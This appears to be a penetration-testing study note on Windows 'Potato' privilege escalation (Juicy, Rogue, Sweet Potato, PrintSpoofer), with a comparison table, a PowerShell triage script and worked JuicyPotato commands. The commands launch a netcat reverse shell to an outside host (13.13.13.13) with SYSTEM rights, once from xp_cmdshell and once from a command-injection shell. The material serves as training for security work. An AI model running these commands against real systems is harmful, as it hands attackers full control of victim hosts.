Potatoes

About

Potato-style attacks are a family of Windows local privilege escalation techniques that abuse token impersonation, local NTLM authentication relay and COM/DCOM activation to obtain a SYSTEM token from a lower-privileged service account. They rely on privileges that Windows grants to service accounts (IIS application pools, MSSQL, Jenkins and similar) by default:

  • SeImpersonatePrivilege – Allows a process to impersonate any client that authenticates to it ("Impersonate a client after authentication"), i.e. to run a thread under another user's token.

  • SeAssignPrimaryTokenPrivilege – Allows a process to assign an arbitrary primary token to a new process ("Replace a process level token"), e.g. via CreateProcessAsUser.

Common principles:

  1. Privilege escalation via token impersonation

    • A process holding SeImpersonatePrivilege may impersonate any client that authenticates to it, SYSTEM included. Once the attacker's thread impersonates SYSTEM, the token is duplicated and used to start a new process (CreateProcessWithTokenW).

    • Variants that have SeAssignPrimaryTokenPrivilege instead hand the stolen token to a new process as its primary token (CreateProcessAsUser). JuicyPotato's -t * tries both calls.

  2. Coercing a SYSTEM process into authenticating to the attacker

    • Rotten Potato and Juicy Potato trigger DCOM activation of a COM object hosted by SYSTEM (BITS in Rotten Potato, any suitable CLSID in Juicy Potato) towards a listener the attacker controls, then man-in-the-middle the resulting NTLM authentication into the local RPC endpoint on port 135, so the attacker ends up with a SYSTEM token to impersonate.

    • Rogue Potato uses the same DCOM trigger but redirects the OXID resolution to a named pipe the attacker owns; the SYSTEM process connects to that pipe and the attacker calls ImpersonateNamedPipeClient. This sidesteps the fix that broke Rotten and Juicy Potato.

    • PrintSpoofer (and the equivalent mode of Sweet Potato) makes the Print Spooler service, which runs as SYSTEM, connect to an attacker-owned named pipe through the RpcRemoteFindFirstPrinterChangeNotificationEx RPC call and impersonates the client. No NTLM relay is involved.

  3. No memory-corruption exploit needed – just misuse of Windows features

    • These attacks abuse legitimate mechanisms (COM/DCOM activation, named pipe impersonation, local NTLM authentication) rather than a memory-safety bug. Microsoft has only hardened individual tricks (for example the DCOM/OXID resolution changes in Windows 10 1809 / Server 2019 that killed Rotten and Juicy Potato), so each variant has its own set of working OS builds.

Comparison of major Potato attacks

Rotten Potato
  • Method used: DCOM activation of BITS towards a local listener, NTLM authentication relayed into local RPC (port 135).
  • Target privileges: SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege).
  • Works on modern Windows? ❌ Broken since Windows 10 1809 / Server 2019.

Juicy Potato
  • Method used: Rotten Potato generalised to an arbitrary CLSID (-c), so it works even where BITS is not usable.
  • Target privileges: SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege).
  • Works on modern Windows? ❌ Same fix as Rotten Potato; also needs a CLSID that is valid for the exact OS build.

Sweet Potato
  • Method used: A toolkit rather than one trick – bundles the BITS/WinRM DCOM trigger of Juicy Potato, the PrintSpoofer named-pipe technique and an EfsRpc trigger.
  • Target privileges: SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege).
  • Works on modern Windows? ✅ Depending on the mode chosen: the DCOM mode has the same limits as Juicy Potato, the PrintSpoofer mode needs the Spooler service.

Rogue Potato
  • Method used: DCOM trigger whose OXID resolution is redirected to an attacker-owned named pipe; needs a redirector on the attacker's port 135 forwarding back to the victim.
  • Target privileges: SeImpersonatePrivilege.
  • Works on modern Windows? ✅ Bypasses the 1809 / 2019 fix.

PrintSpoofer
  • Method used: Print Spooler coerced into connecting to a named pipe, then ImpersonateNamedPipeClient.
  • Target privileges: SeImpersonatePrivilege.
  • Works on modern Windows? ✅ As long as the Print Spooler service is running (frequently disabled on hardened servers since PrintNightmare).

Juicy Potato

In Windows, every process carries an access token describing the account it runs as and the privileges it holds. If that token contains SeImpersonatePrivilege, the process may impersonate other users' tokens. The privilege is commonly granted to service accounts, and it turns a shell as a service account (IIS application pool, MSSQL, Jenkins) into a path to SYSTEM.

Legitimate programs use this for tasks like calling WinLogon to obtain a SYSTEM token. Potato-style attacks abuse it by tricking a SYSTEM process into authenticating to, or connecting to a named pipe owned by, the attacker's process, which then impersonates that SYSTEM client.

In practice the privilege shows up behind web shells, Jenkins RCE and MSSQL xp_cmdshell command execution. If found, it usually provides an easy path to SYSTEM. Always check for it right after gaining code execution (whoami /priv), and note which OS build you are on, because that decides which Potato variant will work.
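The following PowerShell triage script is an added example, not part of the original notes or of any Potato tool: run from the foothold shell, it parses whoami /priv for the two privileges, reads the OS build number and the Spooler state, and maps the result onto the comparison table above. It assumes whoami.exe, Get-CimInstance and Get-Service are available, and uses build 17763 (Windows 10 1809 / Server 2019) as the cut-off where the DCOM fix that stops Rotten/Juicy Potato landed.

```powershell
# Added triage script (not from the original notes): decide which Potato
# variant is worth trying on this host after landing a service-account shell.
# Assumptions: whoami.exe, Get-CimInstance and Get-Service exist; build 17763
# (Windows 10 1809 / Server 2019) is where Rotten/Juicy Potato stopped working.

function Get-TokenPrivileges {
    # Parse `whoami /priv` into privilege name -> state. A privilege listed as
    # Disabled is still held by the token; the Potato tools enable it themselves.
    $privs = @{}
    foreach ($line in (whoami /priv)) {
        if ($line -match '^(Se\w+Privilege)\s+.+\s+(Enabled|Disabled)\s*$') {
            $privs[$Matches[1]] = $Matches[2]
        }
    }
    return $privs
}

function Get-PotatoCandidates {
    param(
        [hashtable]$Privs,
        [int]$Build,
        [bool]$SpoolerRunning
    )
    $hasImpersonate = $Privs.ContainsKey('SeImpersonatePrivilege')
    $hasAssign      = $Privs.ContainsKey('SeAssignPrimaryTokenPrivilege')
    if (-not ($hasImpersonate -or $hasAssign)) {
        return @('No Potato: token holds neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege')
    }
    $candidates = @()
    if ($Build -lt 17763) {
        # Pre-1809 build: the DCOM/NTLM relay trick still works.
        $candidates += 'JuicyPotato (DCOM trigger; pick a -c CLSID for this build, -t * tries both token APIs)'
    } else {
        # 1809+/2019+: OXID resolution is restricted, so use the named-pipe redirect variant.
        $candidates += 'RoguePotato (DCOM trigger with OXID redirect; needs an attacker-side redirector on port 135)'
    }
    if ($SpoolerRunning -and $hasImpersonate) {
        # Works on old and new builds alike, but only while the Spooler is up.
        $candidates += 'PrintSpoofer / SweetPotato PrintSpoofer mode (Spooler named-pipe impersonation)'
    }
    return $candidates
}

# --- collect facts about this host and print the verdict ---
$privs   = Get-TokenPrivileges
$build   = [int](Get-CimInstance -ClassName Win32_OperatingSystem).BuildNumber
$spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
$spoolerRunning = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')

"User: $(whoami)  Build: $build  Spooler running: $spoolerRunning"
"SeImpersonatePrivilege: $($privs['SeImpersonatePrivilege'])  SeAssignPrimaryTokenPrivilege: $($privs['SeAssignPrimaryTokenPrivilege'])"
Get-PotatoCandidates -Privs $privs -Build $build -SpoolerRunning $spoolerRunning
```

The build check is the important part: a JuicyPotato that silently fails on a 2019 box wastes time, while RoguePotato needs infrastructure (the port 135 redirector) that you want to set up before you start, so knowing which branch you are in early saves a round trip.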

Example

-- run Juicy Potato from MSSQL; xp_cmdshell must be enabled (see step 1)
EXEC xp_cmdshell 'c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 13.13.13.13 1337 -e cmd.exe" -t *';

  1. Execute Juicy Potato via xp_cmdshell

  • xp_cmdshell runs OS commands from SQL Server as the SQL Server service account.

  • It is disabled by default; a sysadmin login can enable it with sp_configure 'show advanced options', 1 and sp_configure 'xp_cmdshell', 1, each followed by RECONFIGURE.

  • The SQL Server service account normally holds SeImpersonatePrivilege, which Juicy Potato needs (confirm with whoami /priv).

  2. Abuse token impersonation

  • -l 53375 is the local port on which Juicy Potato's COM server listens for the coerced DCOM connection; any free port works.

  • Without -c, Juicy Potato uses its default BITS CLSID; if that one does not trigger on the target build, pass a CLSID known to work for that OS version with -c.

  • -p is the program to start with the stolen SYSTEM token and -a its arguments; -t * tells Juicy Potato to try both CreateProcessWithTokenW (needs SeImpersonatePrivilege) and CreateProcessAsUser (needs SeAssignPrimaryTokenPrivilege).

  • The attack succeeds only if the service account holds one of those privileges and the host predates the fix (Windows 10 1809 / Server 2019); on newer builds use Rogue Potato or PrintSpoofer instead.

  3. Reverse shell execution via Netcat

  • cmd.exe starts with SYSTEM privileges and executes:

    c:\tools\nc.exe 13.13.13.13 1337 -e cmd.exe

  • This connects back to 13.13.13.13:1337 (the attacker host, which must already be listening, e.g. nc -lvnp 1337) with cmd.exe bound to the socket, giving the attacker a SYSTEM shell.

Example 2

I used this example for one task in Academy; I ran it from a command-injection PowerShell reverse shell.

.\JuicyPotato.exe -l 53375 -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}" -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe -e cmd.exe 13.13.13.13 9999" -t *
